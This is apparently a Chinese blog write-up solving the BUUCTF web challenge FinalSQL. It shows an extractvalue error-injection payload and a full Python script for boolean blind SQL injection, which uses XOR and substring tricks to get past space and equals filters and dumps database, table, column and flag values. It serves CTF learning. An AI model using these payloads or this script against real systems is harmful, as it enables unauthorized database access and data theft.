CTF-Web-[極客大挑戰(zhàn) 2019]FinalSQL

CTF-Web-[極客大挑戰(zhàn) 2019]FinalSQL

博客說(shuō)明

文章所涉及的資料來(lái)自互聯(lián)網(wǎng)整理和個(gè)人總結(jié),意在于個(gè)人學(xué)習(xí)和經(jīng)驗(yàn)匯總,如有什么地方侵權(quán),請(qǐng)聯(lián)系本人刪除,謝謝!本文僅用于學(xué)習(xí)與交流,不得用于非法用途!

CTP平臺(tái)

網(wǎng)址

https://buuoj.cn/challenges

題目

Web類(lèi),[極客大挑戰(zhàn) 2019]FinalSQL

image-20200503202221184

打開(kāi)題目的實(shí)例

image-20200503202349561

思路

SQl的題目,首先試一試萬(wàn)能密碼(雖然不可能,但是還是得試一下)

image-20200503193937673

試一下雙寫(xiě)

image-20200503194119354

看來(lái)被封死了,想想其他的辦法,可以使用extractvalue和updatexml進(jìn)行報(bào)錯(cuò)注入,空格和=號(hào)沒(méi)有,所以我們要使用()來(lái)代替空格,使用like來(lái)代替=號(hào)

使用extractvalue()

/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database()))))%23
image-20200503202524622

看來(lái)是加強(qiáng)到最后一版本了,仔細(xì)查看它的提示,試一試盲注

盲注

試著寫(xiě)腳本,不用試著了,網(wǎng)上大神的腳本

# -*- coding: utf-8 -*-
# @Author: jiaoben
# @Date  :  2020/05/03

import re
import requests
import string

url = "http://dcf33d60-7ffa-41c0-8915-e935ccbdd37b.node3.buuoj.cn//search.php"
flag = ''


def payload(i, j):
    # 數(shù)據(jù)庫(kù)名字
    sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)
    # 表名
    # sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j)
    # 列名
    # sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j)
    # 查詢(xún)flag
    # sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, j)
    data = {"id": sql}
    r = requests.get(url, params=data)
    # print (r.url)
    if "Click" in r.text:
        res = 1
    else:
        res = 0
    return res


def exp():
    global flag
    for i in range(1, 10000):
        print(i, ':')
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)


exp()
print('flag=', flag)

取消數(shù)據(jù)庫(kù)的注釋

image-20200503210406484

猜測(cè)為geek數(shù)據(jù)庫(kù)

爆表

以上的代碼選擇查詢(xún)數(shù)據(jù)表的那行就行了

image-20200503210647125

找到兩個(gè)字段,嘗試F1naI1y

爆字段

以上的代碼選擇查詢(xún)數(shù)據(jù)列的那行就行了

image-20200503210810744

找到3個(gè)字段,可以選擇password

爆數(shù)據(jù)

以上的代碼選擇查詢(xún)flag的那行就行了

image-20200503211542963

flag就找到了

感謝

BUUCTF

以及勤勞的自己

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

友情鏈接更多精彩內(nèi)容